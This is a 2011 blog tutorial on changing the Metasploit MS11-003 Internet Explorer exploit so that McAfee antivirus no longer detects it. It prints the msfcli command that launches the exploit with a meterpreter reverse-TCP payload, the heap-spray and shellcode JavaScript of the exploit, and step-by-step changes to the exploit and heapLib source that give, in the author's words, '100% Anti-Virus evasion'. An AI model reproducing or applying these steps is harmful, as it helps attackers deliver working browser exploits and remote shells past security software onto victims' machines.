1. Introduction
If Metasploit encoders are great tools to avoid Anti-virus detection of the Payload (meterpreter, reverse_tcp, …), it is not always so easy to avoid the “Exploit” detection.
No. This article is not yet another tutorial explaining how to type “set ENCODER xxxx” on your keyboard.
In this post, we will show you how to break the anti-virus detection of your favorite exploits by customizing them a bit (modifying the source code) by using a try-and-error method. Keep in mind that everybody is able to do this. Sometimes, you just don’t know it. This is why I wrote this article 
.
In this demonstration, we will work with McAfee Anti-Virus. It doesn’t mean that it should work with all other Anti-Virus vendor without further modifications of the initial exploit, but the method will be the same.
2. Practical example
Lets consider the browser exploit MS11-003 from Metasploit. Add your favorite payload to the exploit, set up your favorite encoder, and start it.
root@host:~/metasploit/trunk# ./msfcli windows/browser/ms11_003_ie_css_import \ SRVHOST=192.168.1.1 SRVPORT=8989 URIPATH=abc \ PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 \ LPORT=4444 ENCODER=x86/shikata_ga_nai E [*] Please wait while we load the module tree... | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.7.0-dev [core:3.7 api:1.0] + -- --=[ 671 exploits - 347 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12169 updated today (2011.03.28) SRVHOST => 192.168.1.1 SRVPORT => 8989 URIPATH => abc PAYLOAD => windows/meterpreter/reverse_tcp LHOST => 192.168.1.1 LPORT => 4444 ENCODER => x86/shikata_ga_nai [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.1:4444 [*] Using URL: http://192.168.1.1:8989/abc [*] Server started. msf exploit(ms11_003_ie_css_import) >
Now, test the exploit with your favorite browser. What happens ?
The payload is not detected by our anti-virus (as expected), but the exploit is !
So what do we do now ?
3. Breaking the Anti-Virus signature
As you know, the biggest part of an Anti-virus job is to work with signature detection.
In this case, the exploit is JavaScript/HTML based. Therefore, it should not be too difficult for us to modify this source code to avoid matching the AV signature.
3.1 Find the signature
The first step is to find the part of the exploit which triggers the Anti-Virus signature.
First, open the Metasploit exploit with your text editor and locate the “evil part”.
root@host:~/metasploit/trunk# vi modules/exploits/windows/browser/ms11_003_ie_css_import.rb
.....
js_function = rand_text_alpha(rand(100)+1)
# Construct the javascript
custom_js = <<-EOS
function #{js_function}() {
heap = new heapLib.ie(0x20000);
var heapspray = unescape("#{special_sauce}");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.alloc(finalspray); }
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "#{placeholder}")
document.getElementsByTagName("head")[0].appendChild(vlink);
}
EOS
.....
Ok, this is the evil part, responsible of exploiting the IE vulnerability.
Now, we will open the generated HTML exploit file, located in the cache folder of our browser, and locate this piece of code. For doing this, disable your anti-virus and edit the file (UV2gDc[1].htm in this example). As you can see, the JavaScript function has been obfuscated by Metasploit. Because you are a great hacker, you will have no difficulties to recognize it 
Lets modify this function a bit. For example, rename variable “heap” with “hp”, and “heapspray” with “hps”.
Save and close the file, re-enable the anti-virus, an then try to re-open the file.
Damned, still detected ! Note that the file is now detected as a Generic JavaScript backdoor.
OK, lets try to modify a bit more the HTML source. Look at the JavaScript function above, especially the parameters name : function(shellcode, jmpecx, size)
bXOKT.RqyUZ.prototype.hePiPcA = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var hePiPcA = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
hePiPcA += this.tYJSbsU(jmpecx);
hePiPcA += unescape("%u0028%u0028") +
shellcode + heap.TSfqldDBQQFXY((size-138)/2 - shellcode.length);
return hePiPcA;
}
Honestly, if I was an anti-virus editor, I would suspect such kind of parameters. Shellcode and jmpecx patterns don’t smell too good to me. Let’s rename these parameters with “sc” (for shellcode) and “je” (for jmpecx). Don’t forget to rename the variables in the function body as well.
bXOKT.RqyUZ.prototype.hePiPcA = function(sc, je, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (sc.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var hePiPcA = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
hePiPcA += this.tYJSbsU(je);
hePiPcA += unescape("%u0028%u0028") +
sc + heap.TSfqldDBQQFXY((size-138)/2 - sc.length);
return hePiPcA;
}
Save and close the HTML file, re-enable the anti-virus, then try to reopen the file.
BINGO ! The anti-virus doesn’t complain anymore.
3.2. Make the change in Metasploit source
We are almost done. Now that we successfully broke the AV signature, we will add the modifications to Metasploit and try the exploit from the beginning.
Reopen the exploit source from Metasploit directory, and rename the heap and heapspray variable as we did in the previous section.
root@host:~/metasploit/trunk# vi modules/exploits/windows/browser/ms11_003_ie_css_import.rb
.....
js_function = rand_text_alpha(rand(100)+1)
# Construct the javascript
custom_js = <<-EOS
function #{js_function}() {
hp = new heapLib.ie(0x20000);
var hps = unescape("#{special_sauce}");
while(hps.length < 0x1000) hps += unescape("%u4444");
var heapblock = hps;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { hp.alloc(finalspray); }
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "#{placeholder}")
document.getElementsByTagName("head")[0].appendChild(vlink);
}
EOS
.....
Now, where is located the second function we have modified ? You will not find it in the exploit itself.
The answer is a bit below the evil code:
custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts) js = heaplib(custom_js)
HeapLib is a JavaScript library used to manage the heap during a browser exploit. You will find more information about HeapLib at http://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html
HeapLib is located under your Metasploit directory structure at ./lib/rex/exploitation/heaplib.js.b64. Note that the file is base64 encoded.
Our last steps are now to:
- Backup this file
![:-)]()
- Decode the file. Copy/paste the content into one of these base64 decoders: http://www.google.com/search?q=base64+decode
- Modify the decoded code by modifing the parameter names, as we did in the previous section (rename “shellcode” with “sc” and “jmpecx” with “je”; for example).
- Re-encode the new content as base64.
- Replace the file ./lib/rex/exploitation/heaplib.js.b64 with the new content.
It is time to test everything. Restart the exploit (if Metasploit is still running, close it first). If you did not introduce any error in the Metasploit files, you should now be able to use this exploit with 100% Anti-Virus evasion.
Note that in our demonstration, we’ve used McAffe as Anti-Virus. It does not mean that further modifications won’t be necessary for bypassing other anti-virus software!
Enjoy !
Note: There is a rating embedded within this post, please visit this post to rate it.© 2011, foip. All rights reserved.